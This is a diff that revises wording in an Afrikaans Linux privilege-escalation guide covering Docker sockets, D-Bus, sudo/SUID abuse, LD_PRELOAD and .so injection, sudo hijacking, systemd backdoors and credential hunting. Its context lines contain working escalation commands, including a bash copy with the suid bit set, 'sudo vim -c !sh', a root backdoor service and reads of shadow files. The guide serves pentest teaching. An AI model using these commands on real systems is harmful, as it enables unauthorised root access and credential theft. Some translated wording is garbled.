In gevalle waar die Docker CLI nie beskikbaar is nie, kan die Docker-soket steeds gemanipuleer word met die Docker API en `curl` opdragte.
|
||||||
|
|
||||||
1. **Lys Docker Beelde:** Verkry die lys van beskikbare beelde.
|
1. **Lys Docker Beelde:** Verkry die lys van beskikbare beelde.
|
||||||
|
|
||||||
@ -536,7 +536,7 @@ Nadat jy die `socat`-verbinding opgestel het, kan jy opdragte direk in die houer
|
|||||||
|
|
||||||
### Ander
|
### Ander
|
||||||
|
|
||||||
Let daarop dat as jy skrywe toestemmings oor die docker soket het omdat jy **binne die groep `docker`** is, jy het [**meer maniere om voorregte te verhoog**](interesting-groups-linux-pe/index.html#docker-group). As die [**docker API op 'n poort luister** kan jy dit ook kompromitteer](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
|
Let daarop dat as jy skryfrechten oor die docker-soket het omdat jy **binne die groep `docker`** is, jy het [**meer maniere om voorregte te verhoog**](interesting-groups-linux-pe/index.html#docker-group). As die [**docker API op 'n poort luister** kan jy dit ook kompromitteer](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
|
||||||
|
|
||||||
Kyk na **meer maniere om uit docker te breek of dit te misbruik om voorregte te verhoog** in:
|
Kyk na **meer maniere om uit docker te breek of dit te misbruik om voorregte te verhoog** in:
|
||||||
|
|
||||||
@ -564,11 +564,11 @@ runc-privilege-escalation.md
|
|||||||
|
|
||||||
D-Bus is 'n gesofistikeerde **inter-Process Communication (IPC) stelsel** wat toepassings in staat stel om doeltreffend te kommunikeer en data te deel. Ontwerp met die moderne Linux-stelsel in gedagte, bied dit 'n robuuste raamwerk vir verskillende vorme van toepassingskommunikasie.
|
D-Bus is 'n gesofistikeerde **inter-Process Communication (IPC) stelsel** wat toepassings in staat stel om doeltreffend te kommunikeer en data te deel. Ontwerp met die moderne Linux-stelsel in gedagte, bied dit 'n robuuste raamwerk vir verskillende vorme van toepassingskommunikasie.
|
||||||
|
|
||||||
Die stelsel is veelsydig, wat basiese IPC ondersteun wat data-uitruil tussen prosesse verbeter, wat herinner aan **verbeterde UNIX-domeinsokke**. Boonop help dit om gebeurtenisse of seine te broadcast, wat naatlose integrasie tussen stelseldelers bevorder. Byvoorbeeld, 'n sein van 'n Bluetooth-daemon oor 'n inkomende oproep kan 'n musiekspeler aanmoedig om te demp, wat die gebruikerservaring verbeter. Daarbenewens ondersteun D-Bus 'n afstandsobjekstelsel, wat diensversoeke en metode-aanroepe tussen toepassings vereenvoudig, wat prosesse wat tradisioneel kompleks was, stroomlyn.
|
Die stelsel is veelsydig en ondersteun basiese IPC wat data-uitruil tussen prosesse verbeter, wat herinner aan **verbeterde UNIX-domeinsokke**. Boonop help dit om gebeurtenisse of seine te broadcast, wat naatlose integrasie tussen stelseldelers bevorder. Byvoorbeeld, 'n sein van 'n Bluetooth-daemon oor 'n inkomende oproep kan 'n musiekspeler aanmoedig om te demp, wat die gebruikerservaring verbeter. Daarbenewens ondersteun D-Bus 'n afstandsobjekstelsel, wat diensversoeke en metode-aanroepe tussen toepassings vereenvoudig, wat prosesse wat tradisioneel kompleks was, stroomlyn.
|
||||||
|
|
||||||
D-Bus werk op 'n **toelaat/weier model**, wat boodskaptoestemmings (metode-aanroepe, seinuitstralings, ens.) bestuur op grond van die kumulatiewe effek van ooreenstemmende beleidsreëls. Hierdie beleide spesifiseer interaksies met die bus, wat moontlik voorregverhoging deur die uitbuiting van hierdie toestemmings toelaat.
|
D-Bus werk op 'n **toelaat/weier model**, wat boodskaptoestemmings (metode-aanroepe, seinuitstralings, ens.) bestuur op grond van die kumulatiewe effek van ooreenstemmende beleidsreëls. Hierdie beleide spesifiseer interaksies met die bus, wat moontlik voorregverhoging deur die uitbuiting van hierdie toestemmings toelaat.
|
||||||
|
|
||||||
'n Voorbeeld van so 'n beleid in `/etc/dbus-1/system.d/wpa_supplicant.conf` word verskaf, wat toestemmings vir die wortelgebruiker om te besit, te stuur na, en boodskappe van `fi.w1.wpa_supplicant1` te ontvang, detailleer.
|
'n Voorbeeld van so 'n beleid in `/etc/dbus-1/system.d/wpa_supplicant.conf` word verskaf, wat toestemmings vir die wortelgebruiker uiteensit om te besit, te stuur na, en boodskappe van `fi.w1.wpa_supplicant1` te ontvang.
|
||||||
|
|
||||||
Beleide sonder 'n gespesifiseerde gebruiker of groep geld universeel, terwyl "default" konteksbeleide van toepassing is op almal wat nie deur ander spesifieke beleide gedek word nie.
|
Beleide sonder 'n gespesifiseerde gebruiker of groep geld universeel, terwyl "default" konteksbeleide van toepassing is op almal wat nie deur ander spesifieke beleide gedek word nie.
|
||||||
```xml
|
```xml
|
||||||
@ -612,7 +612,7 @@ cat /etc/networks
|
|||||||
#Files used by network services
|
#Files used by network services
|
||||||
lsof -i
|
lsof -i
|
||||||
```
|
```
|
||||||
### Oopende poorte
|
### Oop ports
|
||||||
|
|
||||||
Kontroleer altyd netwerkdienste wat op die masjien loop waarmee jy nie kon interaksie hê nie voordat jy dit toeganklik gemaak het:
|
Kontroleer altyd netwerkdienste wat op die masjien loop waarmee jy nie kon interaksie hê nie voordat jy dit toeganklik gemaak het:
|
||||||
```bash
|
```bash
|
||||||
@ -694,11 +694,11 @@ As jy nie omgee om baie geraas te maak nie en `su` en `timeout` binaire is op di
|
|||||||
|
|
||||||
### $PATH
|
### $PATH
|
||||||
|
|
||||||
As jy vind dat jy **binne 'n sekere gids van die $PATH kan skryf**, mag jy in staat wees om voorregte te verhoog deur **'n agterdeur binne die skryfbare gids te skep** met die naam van 'n opdrag wat deur 'n ander gebruiker (root idealiter) uitgevoer gaan word en wat **nie gelaai word vanaf 'n gids wat voor** jou skryfbare gids in $PATH geleë is nie.
|
As jy vind dat jy **binne 'n sekere gids van die $PATH kan skryf**, mag jy in staat wees om voorregte te verhoog deur **'n agterdeur binne die skryfbare gids te skep** met die naam van 'n opdrag wat deur 'n ander gebruiker (root idealiter) uitgevoer gaan word en wat **nie gelaai word vanaf 'n gids wat voor jou skryfbare gids in $PATH geleë is nie**.
|
||||||
|
|
||||||
### SUDO en SUID
|
### SUDO en SUID
|
||||||
|
|
||||||
Jy mag toegelaat word om 'n sekere opdrag met sudo uit te voer of hulle mag die suid-biet hê. Kontroleer dit met:
|
Jy mag toegelaat word om 'n sekere opdrag met sudo uit te voer of hulle mag die suid-bietjie hê. Kontroleer dit met:
|
||||||
```bash
|
```bash
|
||||||
sudo -l #Check commands you can execute with sudo
|
sudo -l #Check commands you can execute with sudo
|
||||||
find / -perm -4000 2>/dev/null #Find all SUID binaries
|
find / -perm -4000 2>/dev/null #Find all SUID binaries
|
||||||
@ -726,7 +726,7 @@ sudo vim -c '!sh'
|
|||||||
```
|
```
|
||||||
### SETENV
|
### SETENV
|
||||||
|
|
||||||
Hierdie riglyn laat die gebruiker toe om 'n **omgewing veranderlike** in te stel terwyl iets uitgevoer word:
|
Hierdie riglyn laat die gebruiker toe om **'n omgewing veranderlike in te stel** terwyl iets uitgevoer word:
|
||||||
```bash
|
```bash
|
||||||
$ sudo -l
|
$ sudo -l
|
||||||
User waldo may run the following commands on admirer:
|
User waldo may run the following commands on admirer:
|
||||||
@ -769,9 +769,9 @@ Hierdie tegniek kan ook gebruik word as 'n **suid** binêre **'n ander opdrag ui
|
|||||||
|
|
||||||
### SUID binêre met opdrag pad
|
### SUID binêre met opdrag pad
|
||||||
|
|
||||||
As die **suid** binêre **'n ander opdrag uitvoer wat die pad spesifiseer**, kan jy probeer om 'n **funksie** te **eksporteer** wat die naam het van die opdrag wat die suid-lêer aanroep.
|
As die **suid** binêre **'n ander opdrag uitvoer wat die pad spesifiseer**, kan jy probeer om 'n **funksie** te **eksporteer** wat genaamd is soos die opdrag wat die suid-lêer aanroep.
|
||||||
|
|
||||||
Byvoorbeeld, as 'n suid binêre _**/usr/sbin/service apache2 start**_ aanroep, moet jy probeer om die funksie te skep en dit te eksporteer:
|
Byvoorbeeld, as 'n suid binêre _**/usr/sbin/service apache2 start**_ aanroep, moet jy probeer om die funksie te skep en dit te eksport.
|
||||||
```bash
|
```bash
|
||||||
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
|
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
|
||||||
export -f /usr/sbin/service
|
export -f /usr/sbin/service
|
||||||
@ -780,12 +780,12 @@ Dan, wanneer jy die suid-binary aanroep, sal hierdie funksie uitgevoer word
|
|||||||
|
|
||||||
### LD_PRELOAD & **LD_LIBRARY_PATH**
|
### LD_PRELOAD & **LD_LIBRARY_PATH**
|
||||||
|
|
||||||
Die **LD_PRELOAD** omgewing veranderlike word gebruik om een of meer gedeelde biblioteke (.so lêers) aan te dui wat deur die laaier gelaai moet word voordat alle ander, insluitend die standaard C biblioteek (`libc.so`). Hierdie proses staan bekend as die vooraflaai van 'n biblioteek.
|
Die **LD_PRELOAD** omgewing veranderlike word gebruik om een of meer gedeelde biblioteke (.so-lêers) aan te dui wat deur die laaier gelaai moet word voordat alle ander, insluitend die standaard C-biblioteek (`libc.so`). Hierdie proses staan bekend as die vooraflaai van 'n biblioteek.
|
||||||
|
|
||||||
Om egter die stelselsekuriteit te handhaaf en te voorkom dat hierdie funksie uitgebuit word, veral met **suid/sgid** uitvoerbare lêers, handhaaf die stelsel sekere voorwaardes:
|
Om egter die stelselsekuriteit te handhaaf en te voorkom dat hierdie funksie uitgebuit word, veral met **suid/sgid** uitvoerbare lêers, handhaaf die stelsel sekere voorwaardes:
|
||||||
|
|
||||||
- Die laaier ignoreer **LD_PRELOAD** vir uitvoerbare lêers waar die werklike gebruikers-ID (_ruid_) nie ooreenstem met die effektiewe gebruikers-ID (_euid_).
|
- Die laaier ignoreer **LD_PRELOAD** vir uitvoerbare lêers waar die werklike gebruikers-ID (_ruid_) nie ooreenstem met die effektiewe gebruikers-ID (_euid_).
|
||||||
- Vir uitvoerbare lêers met suid/sgid, word slegs biblioteke in standaardpaaie wat ook suid/sgid is, vooraf gelaai.
|
- Vir uitvoerbare lêers met suid/sgid, word slegs biblioteke in standaardpade wat ook suid/sgid is, vooraf gelaai.
|
||||||
|
|
||||||
Privilegie-eskalasie kan voorkom as jy die vermoë het om opdragte met `sudo` uit te voer en die uitvoer van `sudo -l` die stelling **env_keep+=LD_PRELOAD** insluit. Hierdie konfigurasie laat die **LD_PRELOAD** omgewing veranderlike toe om te bly bestaan en erken te word selfs wanneer opdragte met `sudo` uitgevoer word, wat moontlik kan lei tot die uitvoering van arbitrêre kode met verhoogde bevoegdhede.
|
Privilegie-eskalasie kan voorkom as jy die vermoë het om opdragte met `sudo` uit te voer en die uitvoer van `sudo -l` die stelling **env_keep+=LD_PRELOAD** insluit. Hierdie konfigurasie laat die **LD_PRELOAD** omgewing veranderlike toe om te bly bestaan en erken te word selfs wanneer opdragte met `sudo` uitgevoer word, wat moontlik kan lei tot die uitvoering van arbitrêre kode met verhoogde bevoegdhede.
|
||||||
```
|
```
|
||||||
@ -809,7 +809,7 @@ Dan **kompileer dit** met:
|
|||||||
cd /tmp
|
cd /tmp
|
||||||
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
|
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
|
||||||
```
|
```
|
||||||
Uiteindelik, **verhoog privaathede** wat loop
|
Uiteindelik, **verhoog bevoegdhede** wat loop
|
||||||
```bash
|
```bash
|
||||||
sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
|
sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
|
||||||
```
|
```
|
||||||
@ -836,7 +836,7 @@ sudo LD_LIBRARY_PATH=/tmp <COMMAND>
|
|||||||
```
|
```
|
||||||
### SUID Binêre – .so inspuiting
|
### SUID Binêre – .so inspuiting
|
||||||
|
|
||||||
Wanneer jy 'n binêre met **SUID** regte teëkom wat ongewone voorkoms het, is dit 'n goeie praktyk om te verifieer of dit **.so** lêers korrek laai. Dit kan nagegaan word deur die volgende opdrag uit te voer:
|
Wanneer jy 'n binêre met **SUID** regte teëkom wat ongewoon lyk, is dit 'n goeie praktyk om te verifieer of dit **.so** lêers korrek laai. Dit kan nagegaan word deur die volgende opdrag uit te voer:
|
||||||
```bash
|
```bash
|
||||||
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
|
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
|
||||||
```
|
```
|
||||||
@ -859,7 +859,7 @@ Compileer die bogenoemde C-lêer in 'n gedeelde objek (.so) lêer met:
|
|||||||
```bash
|
```bash
|
||||||
gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
|
gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
|
||||||
```
|
```
|
||||||
Uiteindelik, die uitvoering van die geraakte SUID-binary behoort die exploit te aktiveer, wat moontlike stelselskompromie moontlik maak.
|
Uiteindelik, die uitvoering van die aangetaste SUID-binary behoort die ontploffing te aktiveer, wat moontlike stelselskompromie moontlik maak.
|
||||||
|
|
||||||
## Gedeelde Objekt Hijacking
|
## Gedeelde Objekt Hijacking
|
||||||
```bash
|
```bash
|
||||||
@ -871,7 +871,7 @@ something.so => /lib/x86_64-linux-gnu/something.so
|
|||||||
readelf -d payroll | grep PATH
|
readelf -d payroll | grep PATH
|
||||||
0x000000000000001d (RUNPATH) Library runpath: [/development]
|
0x000000000000001d (RUNPATH) Library runpath: [/development]
|
||||||
```
|
```
|
||||||
Nou dat ons 'n SUID-binaar gevind het wat 'n biblioteek laai vanaf 'n gids waar ons kan skryf, laat ons die biblioteek in daardie gids met die nodige naam skep:
|
Nou dat ons 'n SUID-binaar gevind het wat 'n biblioteek laai vanaf 'n gids waar ons kan skryf, kom ons skep die biblioteek in daardie gids met die nodige naam:
|
||||||
```c
|
```c
|
||||||
//gcc src.c -fPIC -shared -o /development/libshared.so
|
//gcc src.c -fPIC -shared -o /development/libshared.so
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
@ -894,7 +894,7 @@ dit beteken dat die biblioteek wat jy gegenereer het 'n funksie moet hê wat `a_
|
|||||||
|
|
||||||
[**GTFOBins**](https://gtfobins.github.io) is 'n saamgestelde lys van Unix-binaries wat deur 'n aanvaller benut kan word om plaaslike sekuriteitsbeperkings te omseil. [**GTFOArgs**](https://gtfoargs.github.io/) is dieselfde, maar vir gevalle waar jy **slegs argumente** in 'n opdrag kan inspuit.
|
[**GTFOBins**](https://gtfobins.github.io) is 'n saamgestelde lys van Unix-binaries wat deur 'n aanvaller benut kan word om plaaslike sekuriteitsbeperkings te omseil. [**GTFOArgs**](https://gtfoargs.github.io/) is dieselfde, maar vir gevalle waar jy **slegs argumente** in 'n opdrag kan inspuit.
|
||||||
|
|
||||||
Die projek versamel wettige funksies van Unix-binaries wat misbruik kan word om uit beperkte shells te breek, voorregte te verhoog of te handhaaf, lêers oor te dra, bind- en omgekeerde shells te spawn, en ander post-exploitasie take te fasiliteer.
|
Die projek versamel wettige funksies van Unix-binaries wat misbruik kan word om uit beperkte shells te breek, voorregte te verhoog of te handhaaf, lêers oor te dra, bind- en omgekeerde shells te spawn, en die ander post-exploitasie take te fasiliteer.
|
||||||
|
|
||||||
> gdb -nx -ex '!sh' -ex quit\
|
> gdb -nx -ex '!sh' -ex quit\
|
||||||
> sudo mysql -e '! /bin/sh'\
|
> sudo mysql -e '! /bin/sh'\
|
||||||
@ -939,7 +939,7 @@ sudo su
|
|||||||
bash exploit_v2.sh
|
bash exploit_v2.sh
|
||||||
/tmp/sh -p
|
/tmp/sh -p
|
||||||
```
|
```
|
||||||
- Die **derde eksploit** (`exploit_v3.sh`) sal **'n sudoers-lêer skep** wat **sudo tokens ewige maak en alle gebruikers toelaat om sudo te gebruik**
|
- Die **derde exploit** (`exploit_v3.sh`) sal **n sudoers-lêer skep** wat **sudo tokens ewige maak en alle gebruikers toelaat om sudo te gebruik**
|
||||||
```bash
|
```bash
|
||||||
bash exploit_v3.sh
|
bash exploit_v3.sh
|
||||||
sudo su
|
sudo su
|
||||||
@ -979,9 +979,9 @@ permit nopass demo as root cmd vim
|
|||||||
```
|
```
|
||||||
### Sudo Hijacking
|
### Sudo Hijacking
|
||||||
|
|
||||||
As jy weet dat 'n **gebruiker gewoonlik aan 'n masjien koppel en `sudo`** gebruik om voorregte te verhoog en jy het 'n shell binne daardie gebruikerskonteks, kan jy **'n nuwe sudo uitvoerbare lêer skep** wat jou kode as root sal uitvoer en dan die gebruiker se opdrag. Dan, **wysig die $PATH** van die gebruikerskonteks (byvoorbeeld deur die nuwe pad in .bash_profile by te voeg) sodat wanneer die gebruiker sudo uitvoer, jou sudo uitvoerbare lêer uitgevoer word.
|
As jy weet dat 'n **gebruiker gewoonlik aan 'n masjien koppel en `sudo` gebruik** om voorregte te verhoog en jy het 'n shell binne daardie gebruikerskonteks, kan jy **'n nuwe sudo uitvoerbare lêer skep** wat jou kode as root sal uitvoer en dan die gebruiker se opdrag. Dan, **wysig die $PATH** van die gebruikerskonteks (byvoorbeeld deur die nuwe pad in .bash_profile by te voeg) sodat wanneer die gebruiker sudo uitvoer, jou sudo uitvoerbare lêer uitgevoer word.
|
||||||
|
|
||||||
Let daarop dat as die gebruiker 'n ander shell gebruik (nie bash nie) jy ander lêers moet wysig om die nuwe pad by te voeg. Byvoorbeeld[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) wysig `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Jy kan 'n ander voorbeeld vind in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
|
Let daarop dat as die gebruiker 'n ander shell gebruik (nie bash nie), jy ander lêers moet wysig om die nuwe pad by te voeg. Byvoorbeeld[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) wysig `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Jy kan 'n ander voorbeeld vind in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
|
||||||
|
|
||||||
Of om iets soos te loop:
|
Of om iets soos te loop:
|
||||||
```bash
|
```bash
|
||||||
@ -1049,7 +1049,7 @@ execve(file,argv,0);
|
|||||||
## Vermoëns
|
## Vermoëns
|
||||||
|
|
||||||
Linux vermoëns bied 'n **substel van die beskikbare wortelprivileges aan 'n proses**. Dit breek effektief wortel **privileges in kleiner en kenmerkende eenhede** op. Elke eenheid kan dan onafhanklik aan prosesse toegeken word. Op hierdie manier word die volle stel privileges verminder, wat die risiko's van uitbuiting verlaag.\
|
Linux vermoëns bied 'n **substel van die beskikbare wortelprivileges aan 'n proses**. Dit breek effektief wortel **privileges in kleiner en kenmerkende eenhede** op. Elke eenheid kan dan onafhanklik aan prosesse toegeken word. Op hierdie manier word die volle stel privileges verminder, wat die risiko's van uitbuiting verlaag.\
|
||||||
Lees die volgende bladsy om **meer oor vermoëns te leer en hoe om dit te misbruik**:
|
Lees die volgende bladsy om **meer te leer oor vermoëns en hoe om dit te misbruik**:
|
||||||
|
|
||||||
{{#ref}}
|
{{#ref}}
|
||||||
linux-capabilities.md
|
linux-capabilities.md
|
||||||
@ -1058,13 +1058,13 @@ linux-capabilities.md
|
|||||||
## Gids toestemmings
|
## Gids toestemmings
|
||||||
|
|
||||||
In 'n gids impliseer die **bit vir "uitvoer"** dat die betrokke gebruiker kan "**cd**" in die vouer.\
|
In 'n gids impliseer die **bit vir "uitvoer"** dat die betrokke gebruiker kan "**cd**" in die vouer.\
|
||||||
Die **"lees"** bit impliseer dat die gebruiker **lêers** kan **lys**, en die **"skryf"** bit impliseer dat die gebruiker **kan verwyder** en **nuwe lêers** kan **skep**.
|
Die **"lees"** bit impliseer dat die gebruiker kan **lys** die **lêers**, en die **"skryf"** bit impliseer dat die gebruiker kan **verwyder** en **skep** nuwe **lêers**.
|
||||||
|
|
||||||
## ACLs
|
## ACLs
|
||||||
|
|
||||||
Toegang Beheer Lyste (ACLs) verteenwoordig die sekondêre laag van diskresionêre toestemmings, wat in staat is om **die tradisionele ugo/rwx toestemmings te oortref**. Hierdie toestemmings verbeter die beheer oor lêer- of gids toegang deur regte aan spesifieke gebruikers toe te laat of te weier wat nie die eienaars of deel van die groep is nie. Hierdie vlak van **fynheid verseker meer presiese toegangsbestuur**. Verdere besonderhede kan [**hier**](https://linuxconfig.org/how-to-manage-acls-on-linux) gevind word.
|
Toegang Beheer Lyste (ACLs) verteenwoordig die sekondêre laag van diskresionêre toestemmings, wat in staat is om **die tradisionele ugo/rwx toestemmings te oortref**. Hierdie toestemmings verbeter beheer oor lêer- of gids toegang deur regte aan spesifieke gebruikers toe te laat of te weier wat nie die eienaars of deel van die groep is nie. Hierdie vlak van **fynheid verseker meer presiese toegang bestuur**. Verdere besonderhede kan [**hier**](https://linuxconfig.org/how-to-manage-acls-on-linux) gevind word.
|
||||||
|
|
||||||
**Gee** gebruiker "kali" lees- en skryfregte oor 'n lêer:
|
**Gee** gebruiker "kali" lees- en skryftoestemmings oor 'n lêer:
|
||||||
```bash
|
```bash
|
||||||
setfacl -m u:kali:rw file.txt
|
setfacl -m u:kali:rw file.txt
|
||||||
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
|
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
|
||||||
@ -1139,19 +1139,19 @@ Gee aan of root kan aanmeld met ssh, die standaard is `no`. Moontlike waardes:
|
|||||||
- `yes`: root kan aanmeld met wagwoord en private sleutel
|
- `yes`: root kan aanmeld met wagwoord en private sleutel
|
||||||
- `without-password` of `prohibit-password`: root kan slegs aanmeld met 'n private sleutel
|
- `without-password` of `prohibit-password`: root kan slegs aanmeld met 'n private sleutel
|
||||||
- `forced-commands-only`: Root kan slegs aanmeld met 'n private sleutel en as die opdragopsies gespesifiseer is
|
- `forced-commands-only`: Root kan slegs aanmeld met 'n private sleutel en as die opdragopsies gespesifiseer is
|
||||||
- `no` : geen
|
- `no` : nee
|
||||||
|
|
||||||
### AuthorizedKeysFile
|
### AuthorizedKeysFile
|
||||||
|
|
||||||
Gee lêers aan wat die publieke sleutels bevat wat vir gebruikersverifikasie gebruik kan word. Dit kan tokens soos `%h` bevat, wat deur die tuisgids vervang sal word. **Jy kan absolute paaie aandui** (begin in `/`) of **relatiewe paaie vanaf die gebruiker se huis**. Byvoorbeeld:
|
Gee aan watter lêers die publieke sleutels bevat wat vir gebruikersverifikasie gebruik kan word. Dit kan tokens soos `%h` bevat, wat deur die tuisgids vervang sal word. **Jy kan absolute paaie aandui** (begin in `/`) of **relatiewe paaie vanaf die gebruiker se huis**. Byvoorbeeld:
|
||||||
```bash
|
```bash
|
||||||
AuthorizedKeysFile .ssh/authorized_keys access
|
AuthorizedKeysFile .ssh/authorized_keys access
|
||||||
```
|
```
|
||||||
Die konfigurasie sal aandui dat as jy probeer om aan te meld met die **private** sleutel van die gebruiker "**testusername**", ssh die publieke sleutel van jou sleutel met diegene in `/home/testusername/.ssh/authorized_keys` en `/home/testusername/access` gaan vergelyk.
|
Die konfigurasie sal aandui dat as jy probeer om in te log met die **private** sleutel van die gebruiker "**testusername**", ssh die publieke sleutel van jou sleutel met die een wat in `/home/testusername/.ssh/authorized_keys` en `/home/testusername/access` geleë is, gaan vergelyk.
|
||||||
|
|
||||||
### ForwardAgent/AllowAgentForwarding
|
### ForwardAgent/AllowAgentForwarding
|
||||||
|
|
||||||
SSH agent forwarding laat jou toe om **jou plaaslike SSH sleutels te gebruik in plaas van om sleutels** (sonder wagwoorde!) op jou bediener te laat sit. So, jy sal in staat wees om te **spring** via ssh **na 'n gasheer** en van daar af **na 'n ander** gasheer **te spring** **met** die **sleutel** wat in jou **begin gasheer** geleë is.
|
SSH agent forwarding laat jou toe om **jou plaaslike SSH sleutels te gebruik in plaas van om sleutels** (sonder wagwoorde!) op jou bediener te laat sit. So, jy sal in staat wees om **te spring** via ssh **na 'n gasheer** en van daar **na 'n ander** gasheer **te spring** **met** die **sleutel** wat in jou **begin gasheer** geleë is.
|
||||||
|
|
||||||
Jy moet hierdie opsie in `$HOME/.ssh.config` soos volg stel:
|
Jy moet hierdie opsie in `$HOME/.ssh.config` soos volg stel:
|
||||||
```
|
```
|
||||||
@ -1163,7 +1163,7 @@ Let wel dat as `Host` `*` is, elke keer as die gebruiker na 'n ander masjien spr
|
|||||||
Die lêer `/etc/ssh_config` kan **oorskryf** hierdie **opsies** en hierdie konfigurasie toelaat of weier.\
|
Die lêer `/etc/ssh_config` kan **oorskryf** hierdie **opsies** en hierdie konfigurasie toelaat of weier.\
|
||||||
Die lêer `/etc/sshd_config` kan **toelaat** of **weier** ssh-agent forwarding met die sleutelwoord `AllowAgentForwarding` (standaard is toelaat).
|
Die lêer `/etc/sshd_config` kan **toelaat** of **weier** ssh-agent forwarding met die sleutelwoord `AllowAgentForwarding` (standaard is toelaat).
|
||||||
|
|
||||||
As jy vind dat Forward Agent in 'n omgewing geconfigureer is, lees die volgende bladsy as **jy dalk dit kan misbruik om voorregte te verhoog**:
|
As jy vind dat Forward Agent in 'n omgewing geconfigureer is, lees die volgende bladsy as **jy mag dit misbruik om voorregte te verhoog**:
|
||||||
|
|
||||||
{{#ref}}
|
{{#ref}}
|
||||||
ssh-forward-agent-exploitation.md
|
ssh-forward-agent-exploitation.md
|
||||||
@ -1181,7 +1181,7 @@ As enige vreemde profielskrip gevind word, moet jy dit nagaan vir **sensitiewe b
|
|||||||
|
|
||||||
### Passwd/Shadow Lêers
|
### Passwd/Shadow Lêers
|
||||||
|
|
||||||
Afhangende van die OS mag die `/etc/passwd` en `/etc/shadow` lêers 'n ander naam gebruik of daar mag 'n rugsteun wees. Daarom word dit aanbeveel om **almal van hulle te vind** en **na te gaan of jy hulle kan lees** om te sien **of daar hashes** binne die lêers is:
|
Afhangende van die OS mag die `/etc/passwd` en `/etc/shadow` lêers 'n ander naam gebruik of daar mag 'n rugsteun wees. Daarom word dit aanbeveel om **almal van hulle te vind** en **te kyk of jy hulle kan lees** om te sien **of daar hashes** binne die lêers is:
|
||||||
```bash
|
```bash
|
||||||
#Passwd equivalent files
|
#Passwd equivalent files
|
||||||
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
|
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
|
||||||
@ -1227,7 +1227,7 @@ ExecStart=/path/to/backdoor
|
|||||||
User=root
|
User=root
|
||||||
Group=root
|
Group=root
|
||||||
```
|
```
|
||||||
Jou backdoor sal uitgevoer word die volgende keer wanneer tomcat begin word.
|
Jou backdoor sal uitgevoer word die volgende keer dat tomcat begin.
|
||||||
|
|
||||||
### Kontroleer Gidsen
|
### Kontroleer Gidsen
|
||||||
|
|
||||||
@ -1292,14 +1292,14 @@ Lees die kode van [**linPEAS**](https://github.com/carlospolop/privilege-escalat
|
|||||||
### Logs
|
### Logs
|
||||||
|
|
||||||
As jy logs kan lees, mag jy in staat wees om **interessante/vertroulike inligting daarin te vind**. Hoe meer vreemd die log is, hoe meer interessant sal dit wees (waarskynlik).\
|
As jy logs kan lees, mag jy in staat wees om **interessante/vertroulike inligting daarin te vind**. Hoe meer vreemd die log is, hoe meer interessant sal dit wees (waarskynlik).\
|
||||||
Ook, sommige "**slegte**" geconfigureerde (terugdeur?) **auditslogs** mag jou toelaat om **wagwoorde** binne auditslogs te **registreer** soos verduidelik in hierdie pos: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
|
Ook kan sommige "**sleg**" geconfigureerde (backdoored?) **audit logs** jou toelaat om **wagwoorde** binne audit logs te **registreer** soos verduidelik in hierdie pos: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
|
||||||
```bash
|
```bash
|
||||||
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
|
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
|
||||||
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
|
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
|
||||||
```
|
```
|
||||||
Om **logs te lees, sal die groep** [**adm**](interesting-groups-linux-pe/index.html#adm-group) baie nuttig wees.
|
Om **logs te lees, sal die groep** [**adm**](interesting-groups-linux-pe/index.html#adm-group) baie nuttig wees.
|
||||||
|
|
||||||
### Shell lêers
|
### Shell-lêers
|
||||||
```bash
|
```bash
|
||||||
~/.bash_profile # if it exists, read it once when you log in to the shell
|
~/.bash_profile # if it exists, read it once when you log in to the shell
|
||||||
~/.bash_login # if it exists, read it once if .bash_profile doesn't exist
|
~/.bash_login # if it exists, read it once if .bash_profile doesn't exist
|
||||||
@ -1313,13 +1313,13 @@ Om **logs te lees, sal die groep** [**adm**](interesting-groups-linux-pe/index.h
|
|||||||
### Generiese Kredensiële Soektog/Regex
|
### Generiese Kredensiële Soektog/Regex
|
||||||
|
|
||||||
Jy moet ook kyk vir lêers wat die woord "**password**" in sy **naam** of binne die **inhoud** bevat, en ook kyk vir IP's en e-posse binne logs, of hashes regexps.\
|
Jy moet ook kyk vir lêers wat die woord "**password**" in sy **naam** of binne die **inhoud** bevat, en ook kyk vir IP's en e-posse binne logs, of hashes regexps.\
|
||||||
Ek gaan nie hier lys hoe om al hierdie te doen nie, maar as jy belangstel, kan jy die laaste toetse wat [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) uitvoer, nagaan.
|
